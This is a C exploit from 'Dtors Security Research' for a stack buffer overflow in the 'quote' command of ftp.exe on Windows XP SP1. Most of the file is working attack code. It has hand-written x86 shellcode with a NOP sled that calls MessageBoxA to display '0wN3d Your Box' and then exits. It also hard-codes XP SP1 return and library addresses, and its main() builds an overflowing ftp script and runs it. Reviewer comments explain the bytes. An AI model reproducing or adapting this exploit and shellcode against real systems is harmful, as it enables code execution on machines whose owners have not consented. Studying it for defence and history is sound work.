/* DSR-FTP_exp.c (Windows XP Pro + sp1)
 *
 *
 * ---------------------------------------------------
 * Dtors Security Research (DSR)
 * Code by: Rave
 * Mail: rave@dtors.net
 * ---------------------------------------------------
 *
 *
 *	  ---[ FTP.exe for windows exploiter ]---
 *
 * Microsoft ships hundreds of fixes these days, but the odd thing is
 * that this buffer overflow was never fixed (at the time of writing).
 *
 * In April of this year (2003, per the advisory referenced below) "aT4r InsaN3" reported this bug on insecure.org
 *
 *
 * (QUOTE:)
 *
 * There is a Buffer overflow in the raw quote command in the Microsoft Windows 
 * XP ftp.exe 
 *
 *
 * just type: 
 *
 *
 * quote AAAAAAAAA....[517 chars]...AAAAAAAAAAAA 
 * ftp.exe will crash 
 *
 *
 * No public exploit existed for this bug, so writing one became my quest.
 *
 * The addresses of
 *
 * MessageBoxA (user32.dll)
 * exit        (msvcrt.dll)
 *
 * hard-coded below (MSG_ADR / exit_ADR) are for Windows XP Pro SP1. If they
 * do not match your Windows version / service pack, find the correct ones
 * and update the defines. The return address in ret / EIP is an absolute
 * address as well and is just as environment-specific :p
 *
 * http://www.tripbit.org/advisories/TA-240403.txt
 */ 


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <windows.h>
#include <winbase.h>
#define NOP 0x90 // <-- our padding exists from NOP'S  (not referenced anywhere in this file: the filler main() writes is 0x41 and shellcode[] spells its 0x90 sled out literally)
#define PAD_SIZE 511 /* bytes of shellcode + 0x41 filler placed before the return address; together with EIP this is roughly the 517-char crash length quoted in the header */
#define ret 0x006f261 /* 0x0006F261: address the overwritten return goes to (expected to land in the NOP sled); printed by main() and must equal the little-endian bytes in EIP */
#define MSG_ADR "\xB2\x11\xD3\x77" /* 0x77D311B2 little-endian: MessageBoxA in user32.dll, Windows XP Pro SP1 per the header */
#define exit_ADR "\xdc\x7a\xc0\x77" /* 0x77C07ADC little-endian: exit in msvcrt.dll, Windows XP Pro SP1 per the header */


#define EIP "\x61\xf2\x06\x00" /* ret as little-endian bytes, appended after PAD_SIZE bytes by main(). NOTE(review): every absolute address here is environment-specific; keep EIP and ret in sync. */

/*
 * Payload that main() copies into the overflowing "quote" argument.
 *
 * It must contain no 0x00 byte: main() measures it with strlen() and copies
 * it with memcpy(), so an embedded NUL would truncate it. The 12 leading 0x90
 * bytes are the NOP sled that the return address in EIP is expected to hit.
 *
 * Rough x86 decoding (done by reviewer, verify with a disassembler): set up
 * a frame, push two NUL-terminated strings onto the stack, call
 * MessageBoxA(0, text, caption, 1) through MSG_ADR, then call exit() through
 * exit_ADR. The absolute addresses make this XP Pro SP1-specific (see header).
 */
char shellcode[] =

"\x90\x90\x90"           // nop sled
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
"\x8B\xEC"               // mov ebp, esp
"\x55"                   // push ebp
"\x8B\xEC"               // mov ebp, esp

"\x33\xFF"               // xor edi, edi   (edi = 0: string terminator below and hWnd argument)
"\x57"                   // push edi       (terminator for the string pushed next)


"\x68\x2D\x2D\x20\x2D"   // push "-- -"
"\x68\x6F\x78\x20\x5D"   // push "ox ]"
"\x68\x75\x72\x20\x42"   // push "ur B"
"\x68\x64\x20\x59\x6F"   // push "d Yo"
"\x68\x30\x77\x4E\x33"   // push "0wN3"
"\x68\x2D\x2D\x5B\x20"   // push "--[ "   -> stack now reads "--[ 0wN3d Your Box ]-- -"
"\x57"                   // push edi       (terminator for the second string)
"\x68\x72\x63\x68\x20"   // push "rch "
"\x68\x65\x73\x65\x61"   // push "esea"
"\x68\x74\x79\x20\x72"   // push "ty r"
"\x68\x63\x75\x72\x69"   // push "curi"
"\x68\x73\x20\x73\x65"   // push "s se"
"\x68\x44\x74\x6F\x72"   // push "Dtor"   -> "Dtors security research "
"\x8D\x55\xC8"           // lea edx, [ebp-0x38]  (start of the second string)
"\x8D\x4D\xE5"           // lea ecx, [ebp-0x1b]  (points into the first string; exact offset not verified here)
"\xB8" MSG_ADR   // mov eax,MessageBoxA addr

"\x6A\x01"               // push 1          (uType)
"\x52"                   // push edx        (lpCaption)
"\x51"                   // push ecx        (lpText)
"\x57"                   // push edi        (hWnd = 0)
"\xFF\xD0"               // call eax        -> MessageBoxA
"\x35\x01\x01\x01\x01"   // xor eax, 0x01010101   (exit code; NUL-free immediate)
"\x50"                   // push eax
"\xB8" exit_ADR   // mov eax,exit addr
"\xFF\xD0"               // call eax        -> exit(), does not return
"\x33\xC0"               // xor eax, eax    (trailing bytes, not expected to execute)
"\x5f"                   // pop edi
"\x5e"                   // pop esi
"\x5b";                  // pop ebx


/* Command-line parameters, assigned once by main() before the script is written. */
char *serv;     /* argv[1]: host written to the script's "open" line */
char *user;     /* argv[2]: user name line of the script */
char *passwd;   /* argv[3]: stored but never written to the script by main() */
int port;       /* argv[4]: port written to the "open" line */

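/*
 * Entry point.
 *
 * Usage: <server> <user> <passwd> <port>
 *
 * Writes an ftp command script named "exploit" into the current directory,
 * runs the Windows ftp client on it (`ftp -s:exploit`) and deletes the
 * script afterwards. The script contains:
 *
 *   open <server> <port>
 *   <user>
 *   <empty line>     -- answers the password prompt; passwd is never sent
 *   quote quote site <PAD_SIZE bytes: shellcode + 'A' filler><EIP>
 *
 * Returns 0 after running ftp, EXIT_FAILURE on bad usage, an invalid port,
 * or when the script file cannot be written.
 *
 * NOTE(review): the script has a fixed, predictable name in the current
 * directory and "ftp" is resolved through PATH by system(); run this from a
 * directory you control.
 */
int main(int argc, char **argv)
{
	FILE *fd;
	char buffer[900];
	size_t sc_len;
	size_t i;
	char *end;
	long p;

	if (argc != 5) {
		/* Previously fell through and dereferenced the missing argv entries. */
		fprintf(stdout, "\nFtp_exploit.exe usage <server> <user> <passwd> <port>\n");
		return EXIT_FAILURE;
	}

	serv = argv[1];
	user = argv[2];
	passwd = argv[3];   /* kept for compatibility; not written to the script (see above) */

	/* strtol instead of atoi so garbage or an out-of-range port is rejected. */
	errno = 0;
	p = strtol(argv[4], &end, 10);
	if (end == argv[4] || *end != '\0' || errno == ERANGE || p < 1 || p > 65535) {
		fprintf(stderr, "invalid port: %s\n", argv[4]);
		return EXIT_FAILURE;
	}
	port = (int)p;

	fprintf(stdout, "\n---------------------------------------------------\n");
	fprintf(stdout, "Dtors Security Research (DSR) \n");
	fprintf(stdout, "Exploit Code by: Rave\n");
	fprintf(stdout, "Mail: rave@dtors.net\n");
	fprintf(stdout, "---------------------------------------------------\n");
	fprintf(stdout, "Shellcode located at: 0x%x\n", (unsigned)ret);

	/*
	 * Build the overflowing argument: shellcode first, then 0x41 filler up
	 * to PAD_SIZE. strlen() is only correct because the shellcode contains
	 * no 0x00 byte; the rest of buffer[] stays zeroed so "%s" stops at
	 * PAD_SIZE.
	 */
	sc_len = strlen(shellcode);
	if (sc_len >= sizeof buffer) {
		fprintf(stderr, "shellcode too large for buffer\n");
		return EXIT_FAILURE;
	}
	memset(buffer, '\0', sizeof buffer);
	memcpy(buffer, shellcode, sc_len);
	for (i = sc_len; i < PAD_SIZE; i++)
		buffer[i] = 0x41;

	/*
	 * "w" rather than the original "a+": in append mode a script left over
	 * from an aborted run would be replayed in front of the new one.
	 */
	fd = fopen("exploit", "w");
	if (fd == NULL) {
		perror("error in opening exploit file");
		return EXIT_FAILURE;
	}

	fprintf(fd, "open %s %d\n", serv, port);
	fprintf(fd, "%s\n", user);

	/*
	 * The leading "\n" is the empty password line. EIP ends in 0x00, so
	 * "%s" emits only its first three bytes; presumably the ftp client's
	 * own string terminator supplies the fourth -- TODO confirm.
	 */
	fprintf(fd, "\nquote quote site %s%s\n", buffer, EIP);

	/* fclose() flushes; a write error here would otherwise yield a broken script. */
	if (fclose(fd) != 0) {
		perror("error writing exploit file");
		remove("exploit");
		return EXIT_FAILURE;
	}

	system("ftp -s:exploit");
	remove("exploit");

	return 0;
}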
